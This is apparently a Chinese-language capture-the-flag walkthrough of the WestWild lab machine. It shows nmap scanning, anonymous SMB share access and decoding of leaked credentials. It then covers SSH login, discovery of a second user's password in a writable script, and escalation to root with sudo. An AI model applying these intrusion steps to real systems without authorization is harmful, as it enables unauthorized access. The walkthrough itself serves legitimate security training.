信息收集
主机发现
先看主机和靶机的ip。
ip a
sudu nmap -sn 192.168.1.0/24
端口扫描
sudu nmap -sT --min-rate 10000 -p- 192.168.1.135
对端口进行详细信息扫描。
sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.1.135
-sV 扫描服务版本
-sC 用默认的脚本进行扫描
-O 探测操作系统的版本
┌──(kali💋kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.1.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:34 CST
Nmap scan report for 192.168.1.135
Host is up (0.00058s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 6fee95919c62b214cd630a3ef8109eda (DSA)
| 2048 104594fea72f028a9b211a31c5033048 (RSA)
| 256 9794178618e28e7a738e412076ba5173 (ECDSA)
|_ 256 2381c776bb3778ee3b73e255ad813272 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:CC:AC:22 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 7h00m02s, deviation: 1h43m55s, median: 8h00m02s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2024-08-02T15:35:25
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: westwild
| NetBIOS computer name: WESTWILD\x00
| Domain name: \x00
| FQDN: westwild
|_ System time: 2024-08-02T18:35:25+03:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds
22是open SSH 服务,6.6.1版本,这个端口有漏洞的概率极小,优先级排后。80端口开放web服务,139和445端口都是samba服务。
进行UDP的扫描。
sudo nmap -sU --top-ports 20 192.168.1.135
--top-ports 20 对前20个端口进行扫描
┌──(kali💋kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.1.135 255 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:38 CST
Nmap scan report for 192.168.1.135
Host is up (0.00066s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:CC:AC:22 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 35.42 seconds
tcp 扫出的四个端口,在tcp协议下都可以进行渗透测试,如果涉及到一些异常情况,或者需要找一些新的信息的时候,也可能涉及到udp。
利用nmap自带的漏洞脚本进行扫描。
sudo nmap --script=vuln -p22,80,139,445 192.168.1.135
┌──(kali💋kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,139,445 192.168.1.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:46 CST
Nmap scan report for 192.168.1.135
Host is up (0.00052s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:CC:AC:22 (VMware)
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 334.71 seconds
samba 测试
web渗透先放一旁,这里有两个端口开放smb服务,攻击面可能比较大。
sudo smbmap -H 192.168.1.135
显示3个smb的共享信息,但是只有wave可以访问,我们尝试进行连接。不需要密码,直接回车。
sudo smbclient //192.168.1.135/wave
这里有两个文件,我们把它们下载下来。打开看看。
┌──(kali💋kali)-[~/Desktop]
└─$ cat FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K
┌──(kali💋kali)-[~/Desktop]
└─$ cat message_from_aveng.txt
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset it for me .
Thank You
Aveng
一个是base64编码,一个是讲述Aveng丢失了密码想让wave重置的这么一个信息。
我们把base64编码解密,如果解密不成功,说明它有可能是明文。
┌──(kali💋kali)-[~/Desktop]
└─$ echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K |base64 -d
Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open
给了一个用户名和密码。
这样smb服务的两个端口就利用完毕了,我们还有22和80端口,22端口的ssh服务排后,先看80端口的web服务,
web 渗透
访问网页。
没有什么特别的信息,右键查看源代码。
<!DOCTYPE html>
<html>
<head>
<style>
body {
background-image: url("bkgro.png");
background-color: #ffb500;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
}
</style>
</head>
<body>
</body>
</html>
没有什么信息。查看图片是否有隐写。
┌──(kali💋kali)-[~/Desktop]
└─$ exiftool bkgro.png 127 ⨯
ExifTool Version Number : 12.92
File Name : bkgro.png
Directory : .
File Size : 13 kB
File Modification Date/Time : 2019:07:30 11:03:42+08:00
File Access Date/Time : 2024:08:02 16:19:52+08:00
File Inode Change Date/Time : 2024:08:02 16:19:51+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 1280
Image Height : 720
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Relative Colorimetric
Pixels Per Unit X : 2835
Pixels Per Unit Y : 2835
Pixel Units : meters
Palette : (Binary data 285 bytes, use -b option to extract)
Image Size : 1280x720
Megapixels : 0.922
没有什么有用的信息。我们先把拿到的信息进行ssh服务连接。
利用samba敏感信息获取立足点
还记得我们得到的信息嘛?
user:wavex
password:door+open
┌──(kali💋kali)-[~]
└─$ sudo ssh wavex@192.168.1.135 130 ⨯
wavex@192.168.1.135's password:
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Fri Aug 2 19:46:01 +03 2024
System load: 0.0 Processes: 164
Usage of /: 78.0% of 1.70GB Users logged in: 0
Memory usage: 10% IP address for eth0: 192.168.1.135
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Aug 2 19:46:01 2024 from 192.168.1.128
wavex@WestWild:~$
成功获取。先来三件套。
wavex@WestWild:~$ whoami
wavex
wavex@WestWild:~$ uname -a
Linux WestWild 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:28:33 UTC 2019 i686 i686 i686 GNU/Linux
wavex@WestWild:~$ sudo -l
[sudo] password for wavex:
Sorry, user wavex may not run sudo on WestWild.
wavex@WestWild:~$
我们可以查看home文件。在home文件下有俩个目录。
wavex@WestWild:~$ cd /home
wavex@WestWild:/home$ ls
aveng wavex
wavex@WestWild:/home$ cd wavex
wavex@WestWild:~$ ls-liah
ls-liah: command not found
wavex@WestWild:~$ ls -liah
total 36K
69673 drwxr-xr-x 4 wavex wavex 4.0K Aug 2 19:46 .
7684 drwxr-xr-x 4 root root 4.0K Jul 30 2019 ..
69900 -rw------- 1 wavex wavex 5 Aug 2 19:46 .bash_history
69674 -rw-r--r-- 1 wavex wavex 220 Jul 30 2019 .bash_logout
66935 -rw-r--r-- 1 wavex wavex 3.6K Jul 30 2019 .bashrc
69882 drwx------ 2 wavex wavex 4.0K Aug 2 2019 .cache
611 -rw-r--r-- 1 wavex wavex 675 Jul 30 2019 .profile
69690 -rw------- 1 wavex wavex 870 Aug 2 2019 .viminfo
69679 drwxrwxrwx 2 nobody nogroup 4.0K Jul 30 2019 wave
wavex@WestWild:~$
我们看一下wavex这个用户的vm的编辑记录。
cat .viminfo
wavex@WestWild:~$ cat .viminfo
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!
# Value of 'encoding' when this file was written
*encoding=utf-8
# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:!bash
:x
# Search String History (newest to oldest):
# Expression History (newest to oldest):
# Input Line History (newest to oldest):
# Input Line History (newest to oldest):
# Registers:
# File marks:
'0 1 0 /etc/passwd
'1 2 0 ~/wave/flag1.txt
'2 2 0 ~/wave/flag1.txt
# Jumplist (newest first):
-' 1 0 /etc/passwd
-' 2 0 ~/wave/flag1.txt
-' 1 0 ~/wave/flag1.txt
-' 1 0 /etc/shadow
-' 2 0 ~/wave/flag1.txt
-' 1 0 ~/wave/flag1.txt
-' 2 0 ~/wave/flag1.txt
-' 1 0 ~/wave/flag1.txt
# History of marks within files (newest to oldest):
> /etc/passwd
" 1 0
> ~/wave/flag1.txt
" 2 0
^ 2 0
. 1 2
+ 1 2
wavex@WestWild:~$
发现有/etc/passwd,我们看一下对passwd的权限。
wavex@WestWild:~$ ls -liah /etc/passwd
69678 -rw-r--r-- 1 root root 1.3K Jul 30 2019 /etc/passwd
看来只有读的权限。
我们看一下有没有自动任务。
wavex@WestWild:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
看来是没有。我们寻找可写文件。
find / -writable -type f ! -path '/proc/*' 2>/dev/null
-writable 可写
! -path '/proc/*' 排除这个路径
2>/dev/null 丢掉错误信息
wavex@WestWild:~$ find / -writable -type f ! -path '/proc/*' 2>/dev/null
/sys/fs/cgroup/systemd/user/1001.user/2.session/tasks
/sys/fs/cgroup/systemd/user/1001.user/2.session/cgroup.procs
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
/usr/share/av/westsidesecret/ififoregt.sh
/home/wavex/.cache/motd.legal-displayed
/home/wavex/wave/FLAG1.txt
/home/wavex/wave/message_from_aveng.txt
/home/wavex/.bash_history
/home/wavex/.profile
/home/wavex/.bashrc
/home/wavex/.viminfo
/home/wavex/.bash_logout
wavex@WestWild:~$
我们打开/usr/share/av/westsidesecret/ififoregt.sh文件
cat /usr/share/av/westsidesecret/ififoregt.sh
wavex@WestWild:~$ cat /usr/share/av/westsidesecret/ififoregt.sh
#!/bin/bash
figlet "if i foregt so this my way"
echo "user:aveng"
echo "password:kaizen+80"
得到新的用户名密码。我们直接切换用户,进行用户间的横向移动。
su aveng
aveng@WestWild:/home/wavex$ whoami
aveng
aveng@WestWild:/home/wavex$ cd ../aveng
aveng@WestWild:~$ ls -liah
total 28K
69176 dr-xr-xr-x 3 aveng aveng 4.0K Aug 2 2019 .
7684 drwxr-xr-x 4 root root 4.0K Jul 30 2019 ..
13771 -rw-r--r-- 1 aveng aveng 220 Jul 30 2019 .bash_logout
13504 -rw-r--r-- 1 aveng aveng 3.6K Jul 30 2019 .bashrc
69632 drwx------ 2 aveng aveng 4.0K Jul 30 2019 .cache
716 -rw-r--r-- 1 aveng aveng 675 Jul 30 2019 .profile
69667 -rw------- 1 aveng aveng 511 Jul 30 2019 .viminfo
sudo 提权到 root
利用 sudo -l 查看一下权限
aveng@WestWild:~$ sudo -l
[sudo] password for aveng:
Matching Defaults entries for aveng on WestWild:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aveng may run the following commands on WestWild:
(ALL : ALL) ALL
直接是root权限了,那就非常简单了。
sudo /bin/bash
aveng@WestWild:~$ sudo /bin/bash
root@WestWild:~# whoami
root
root@WestWild:~#
在root目录下还有一个flag2的文件。
root@WestWild:~# cd /root
root@WestWild:/root# ls
FLAG2.txt
root@WestWild:/root# cat FLAG2.txt
Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}
Great! take a screenshot and Share it with me in twitter @HashimAlshareff